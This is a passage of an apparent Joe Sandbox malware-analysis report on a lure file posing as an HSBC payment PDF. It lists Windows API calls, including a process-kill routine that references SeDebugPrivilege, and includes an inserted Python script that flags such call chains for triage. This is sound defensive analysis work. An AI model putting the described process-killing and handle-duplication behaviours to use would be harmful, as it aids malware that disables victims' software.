                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                    • String ID: U
                                                                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                                                                    • Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                                                                                                                    • Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
                                                                                                                                                    • Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                                                                                                                    • Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
                                                                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00478F00
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 560350794-0
                                                                                                                                                    • Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                                                                                                                    • Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
                                                                                                                                                    • Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                                                                                                                    • Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                                                                                                                                      • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                                                                                                                                      • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00464D40
                                                                                                                                                    • _wcscmp.LIBCMT ref: 00464D5A
                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00464D75
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 793581249-0
                                                                                                                                                    • Opcode ID: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                                                                                                                    • Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
                                                                                                                                                    • Opcode Fuzzy Hash: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                                                                                                                    • Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B
                                                                                                                                                    APIs
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InvalidateRect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 634782764-0
                                                                                                                                                    • Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                                                                                                                    • Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
                                                                                                                                                    • Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                                                                                                                    • Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D
                                                                                                                                                    APIs
                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
                                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
                                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
                                                                                                                                                    • DestroyIcon.USER32(00000000), ref: 0043C37F
                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
                                                                                                                                                    • DestroyIcon.USER32(?), ref: 0043C3AB
                                                                                                                                                      • Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2819616528-0
                                                                                                                                                    • Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
• Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
• Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
• Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
• HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
• GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
• DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
• GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
• DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
• CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
• Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
• Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
• Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
• SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
• _wcscat.LIBCMT ref: 00486EAD
• SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: MessageSend$Window_wcscat
• String ID: SysListView32
• API String ID: 307300125-78025650
• Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
• Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
• Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
• Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68
APIs
  • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
  • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
  • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
• GetLastError.KERNEL32 ref: 0047E9B7
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
• GetLastError.KERNEL32(00000000), ref: 0047EA6E
• CloseHandle.KERNEL32(00000000), ref: 0047EAA3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
• Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
• Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
• Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99
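The function summarised directly above is the one worth reading closely when triaging this report: a Toolhelp32 process snapshot walk (via the subcall at 00463C55), OpenProcess with desired access 00000001 (PROCESS_TERMINATE), then TerminateProcess, with the string SeDebugPrivilege referenced by the same function. The report shows the string reference but not the token-adjustment call itself, so the string alone only suggests that the privilege is enabled somewhere nearby. What follows is an added example, not part of the Joe Sandbox report and not code from the sample: a small Python triage script that parses the APIs / Strings / Similarity lines of these summaries and flags two chains, the process-kill primitive above and the DuplicateHandle-then-CreateThread chain from the first summary in this section. The sample input is constructed from the report lines above (hashes and dump sources dropped); the parser, the rule names and the findings format are this example's own assumptions, not Joe Sandbox output.

```python
"""Triage helper for Joe Sandbox function summaries (added example, not report output)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: three summaries copied from the report, trimmed to the
# "APIs" / "Strings" / "Similarity" lines the parser uses.
SAMPLE = """\
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
• HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
• DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
• CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
APIs
  • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
  • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
  • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
• GetLastError.KERNEL32 ref: 0047E9B7
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
• CloseHandle.KERNEL32(00000000), ref: 0047EAA3
Strings
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 00463033
Strings
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
"""

# One bullet line of the APIs section; the args list and the subcall prefix are optional.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
PROCESS_TERMINATE = 0x0001  # Win32 access right passed to OpenProcess


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: int                 # call-site address from "ref:"
    subcall: Optional[int]   # callee address when listed as "Part of subcall function"


@dataclass
class FunctionSummary:
    calls: List[Call] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    api_string_id: Optional[str] = None

    def apis(self):
        return {c.api for c in self.calls}


def parse_summaries(text):
    """Split the report text into one FunctionSummary per 'APIs' header."""
    blocks, cur = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            cur = FunctionSummary()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            sub = int(m.group("sub"), 16) if m.group("sub") else None
            cur.calls.append(Call(m.group("api"), m.group("module"), args, int(m.group("ref"), 16), sub))
        elif stripped.startswith("• String ID:"):
            val = stripped[len("• String ID:"):].strip()
            cur.strings = val.split("$") if val else []   # "$" separates string xrefs
        elif stripped.startswith("• API String ID:"):
            cur.api_string_id = stripped[len("• API String ID:"):].strip()
    return blocks


def _hex_arg(arg):
    try:
        return int(arg, 16)
    except ValueError:
        return None  # "?" means the static pass could not resolve the value


def classify(summary):
    """Return findings for one summary; rule names are this example's own."""
    findings, apis = [], summary.apis()
    if {"OpenProcess", "TerminateProcess"} <= apis:
        access = {_hex_arg(c.args[0]) for c in summary.calls if c.api == "OpenProcess" and c.args}
        access.discard(None)
        term = next(c for c in summary.calls if c.api == "TerminateProcess")
        notes = []
        if access and all(a & PROCESS_TERMINATE for a in access):
            notes.append("OpenProcess asks for PROCESS_TERMINATE (0x1)")
        if "SeDebugPrivilege" in summary.strings:
            notes.append("references SeDebugPrivilege")
        if "CreateToolhelp32Snapshot" in apis:
            notes.append("walks a Toolhelp32 process snapshot")
        findings.append(f"process-kill at 0x{term.ref:08X}: " + "; ".join(notes))
    if {"DuplicateHandle", "CreateThread"} <= apis:
        thr = next(c for c in summary.calls if c.api == "CreateThread")
        findings.append(f"handle-dup-then-thread at 0x{thr.ref:08X}")
    return findings


def triage(text):
    return [(i, classify(s)) for i, s in enumerate(parse_summaries(text))]


if __name__ == "__main__":
    for idx, found in triage(SAMPLE):
        print(f"summary {idx}: {found or 'nothing flagged'}")
```

Running it on the constructed sample flags the second summary as a process-kill chain with PROCESS_TERMINATE access, the SeDebugPrivilege reference and the snapshot walk, flags the first as a DuplicateHandle-then-CreateThread chain, and leaves the LoadIconW summary alone. The same parser accepts a whole report's disassembly section pasted in, since it only keys on the "APIs" header and the bullet layout shown above.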
                                                                                                                                                    APIs
                                                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00463033
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconLoad
                                                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                                                    • API String ID: 2457776203-404129466
                                                                                                                                                    • Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                                                                                                                    • Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
                                                                                                                                                    • Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                                                                                                                    • Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00464319
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00464336
                                                                                                                                                    • _wprintf.LIBCMT ref: 0046435C
                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
                                                                                                                                                    Strings
                                                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00464357
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                    • API String ID: 3648134473-3128320259
                                                                                                                                                    • Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                                                                                                                    • Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
                                                                                                                                                    • Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                                                                                                                    • Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0048D47C
                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0048D49C
                                                                                                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
                                                                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
                                                                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
                                                                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 0048D735
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
                                                                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
